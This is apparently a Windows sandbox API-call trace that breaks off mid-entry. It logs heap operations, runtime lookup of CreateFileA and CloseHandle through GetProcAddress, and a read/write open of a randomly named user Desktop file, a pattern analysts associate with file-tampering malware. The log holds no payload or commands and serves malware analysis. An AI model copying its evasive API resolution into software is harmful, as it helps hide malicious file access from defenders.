WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889ad8 [0031.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889ad8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0031.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.672] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0031.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ad8 [0031.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889ad8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0031.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.672] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0031.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0031.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a", cchWideChar=89, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 89 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x59) returned 0x87aa40 [0031.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a", cchWideChar=89, lpMultiByteStr=0x87aa40, cbMultiByte=89, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a", lpUsedDefaultChar=0x0) returned 89 [0031.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0031.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.673] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\yrqdf_asfhekn.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=89, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0031.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb2) returned 0x7c5448 [0031.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=89, lpWideCharStr=0x7c5448, cchWideChar=89 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\yRQDF_aSfhekn.m4a") returned 89 [0031.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c5508 [0031.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0031.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.675] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0031.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.676] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0031.677] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.678] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.678] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0031.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cce8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.678] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0031.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.679] CloseHandle (hObject=0x140) returned 1 [0031.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.679] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 